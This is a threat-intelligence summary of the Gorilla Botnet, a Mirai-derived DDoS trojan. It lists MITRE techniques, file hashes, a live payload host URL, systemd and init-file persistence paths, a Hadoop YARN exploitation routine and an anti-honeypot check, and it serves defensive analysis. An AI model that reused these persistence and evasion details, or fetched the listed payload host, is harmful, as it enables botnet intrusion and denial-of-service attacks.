Keypoints
- Active from September 4–27, 2024, issuing over 300,000 DDoS commands with daily peaks above 20,000.
- Targeted 113 countries and 20,000+ targets; China (20%) and the U.S. (19%) were most affected.
- Supports ARM, MIPS, x86_64, and x86 architectures and reuses/modifies Mirai source code with a custom signature.
- Implements many DDoS vectors (up to 19), with UDP Flood (41%), ACK BYPASS Flood (24%), and VSE Flood (12%) most common.
- Includes five built-in C&C servers and selects one at random on startup for command reception.
- Persistence via systemd service (custom.service), /etc/inittab, /etc/profile, /etc/init.d/mybinary, and startup script links; downloads and runs lol.sh from a remote host.
- Counter-detection measures include checking for /proc to detect honeypots and use of KekSec-style encryption to hide strings.
MITRE Techniques
- [T1078] Valid Accounts – Exploits Hadoop YARN RPC unauthorized access to obtain access and elevated privileges (‘yarn_init’ integrates code to exploit the Hadoop Yarn RPC unauthorized access vulnerability)
- [T1203] Execution – Executes downloaded scripts automatically on startup/login to run payloads (‘download a script named lol.sh … set execution permissions, and execute the script’)
- [T1547] Boot or Logon Autostart Execution – Creates service and init entries to persist across reboots (‘creates a service file named custom.service in the /etc/systemd/system/ directory’ and adds entries to /etc/inittab, /etc/profile, /etc/init.d/mybinary)
- [T1562] Impair Defenses – Attempts to detect and avoid honeypots by checking for system artifacts (‘/proc filesystem not found. Exiting. gorilla botnet didnt like this honeypot…’)
- [T1071] Application Layer Protocol – Uses built-in C&C servers for command and control and randomly selects one on startup (‘five built-in command and control (C&C) servers; upon running, it randomly selects one to connect to’)
- [T1499] Endpoint Denial of Service – Executes a range of DDoS attack vectors to disrupt targets (‘Gorilla Botnet issued over 300,000 DDoS attack commands’)
Indicators of Compromise
- [File hashes] Malware samples – 276adc6a55f13a229a5ff482e49f3a0b, 63cbfc2c626da269c67506636bb1ea30, and 5 more hashes
- [Domain] Payload download/C2 host – http://pen.gorillafirewall.su/ (used to download lol.sh)
- [File names] Persistence and propagation artifacts – lol.sh (propagation script), custom.service (systemd service), mybinary (/etc/init.d startup script)
Gorilla Botnet is a Mirai-derived trojan that compiles for ARM, MIPS, x86_64, and x86 and reuses Mirai’s online and command-parsing modules while embedding its own signature. On execution it randomly connects to one of five built-in C&C servers using Mirai-like connection procedures, awaits commands, and supports up to 19 DDoS vectors—most commonly UDP Flood, ACK BYPASS Flood, and VSE Flood—favoring connectionless UDP to spoof sources and amplify traffic despite a limited bot count.
For persistence and propagation, the malware installs a systemd unit (custom.service) to download and run a remote script (lol.sh) from http://pen.gorillafirewall.su/, writes entries to /etc/inittab and /etc/profile, adds an /etc/init.d/mybinary script, and attempts to link it into /etc/rc.d/rc.local or /etc/rc.conf. It also contains a ‘yarn_init’ routine to exploit Hadoop YARN RPC vulnerabilities, allowing it to gain higher privileges on hosts where YARN is installed.
To hinder analysis and detection, Gorilla Botnet uses KekSec-style encryption to conceal key strings and includes anti-honeypot checks (e.g., verifying the presence of /proc and exiting if missing). These combined C2, persistence, exploitation, multi-architecture support, and evasion capabilities enable sustained DDoS operations and broad targeting across sectors.
Read more: https://nsfocusglobal.com/over-300000-gorillabot-the-new-king-of-ddos-attacks/